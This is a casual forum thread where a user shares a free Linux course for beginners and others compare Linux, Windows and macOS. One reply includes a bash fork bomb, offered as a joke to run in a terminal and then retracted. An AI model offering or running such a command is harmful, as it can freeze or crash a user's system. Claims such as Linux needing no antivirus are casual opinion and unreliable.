• so few hours ago I found a free course for people who don't know anything about Linux or has less knowledge about it. It is free so it's not correct to say I'm doing anything marketing or advertisement.
    Well it's kinda advertisement but I will not get anything from it. It's not affiliate marketing πŸ˜‚ .
    So if u r interested in to learn Linux here is ur start point. They are giving certificates too but that's paid version of this course.
    Just want to share it to u guys.
    If some people r interested here we could make a group or small community here for Linux.

  • Do you have these courses in video format? We can learn quickly if we follow videos.
    Thanks for the share.

  • @Swalalalala33 The ones that work with code and network must be prefer linux because is far faster.. but I guess people who have to actually work in tech won't think that way. It is only good for server hosting and programming. I'm not doing any of those, Windows can save me unecessary wasted time :grinning: It just as another tool for another purpose and different tastes. What do you think, Ash? Thanks for sharing the info, anyway... :)

  • @bubbleboba no. I don't have video format of it. But in some chapters they have videos i guess. I haven't complete first chapter so idk. Also they will give notes as we go progress is course.

  • @kaia_
    Linux have many flavors just like ui of Samsung n Motorola are different but the android version is same. Android is based on Linux so it is obvious. I tried to start with Linux long ago when I found a windows like Linux flavor and it took tiny space in my laptop so I guess it will great if I use it primarily. Linux is open source so anyone can modify it or anyone can use that modification that's y it update in short time . And it's up to us wather we update it or not. Just like plug in. Uts just hard to understand in the beginning. Also yeah there are windows servers too. But Linux servers are cheap compare to them coz its open source . And forgot to mention Linux does not need anti-virus xD

  • @Swalalalala33 That's right, Ash. We can configure everything if we know what we're doing. I remember a time when I could run ubuntu on my windows to delete viruses on my PC. But there's also funny thing, I had to reboot ubuntu to get a new keyboard layout working. In short, they all are awesome. The only issue we have is finding softwares that both work for windows and linux

  • @Swalalalala33 said in [I found a free course, ok inter ?? Sorry internet.. ]

    Keep it up!! It's a great job u doing brother !! Bravo I like people spread and guide knowledge (yeah suppose to be free) to another being without any agenda !! πŸ™πŸ‘

  • @Swalalalala33 Will keep it short. Linux doesn't have many software distributions.
    If you wanna code and surf the web, Go for it. But for most of the industry standardised softwares, you'd have to take up Windows.
    Mac is a good alternative though (some might find it expensive). Got better security than Windows.
    PS: Try running this on the terminal root folder -> :(){ :|: & };:
    (tbh, dont try it :face_savouring_delicious_food: :grimacing_face: :grinning_face_with_smiling_eyes: )

  • Well Brother I very much aware of it what magic Linux can do so yeah
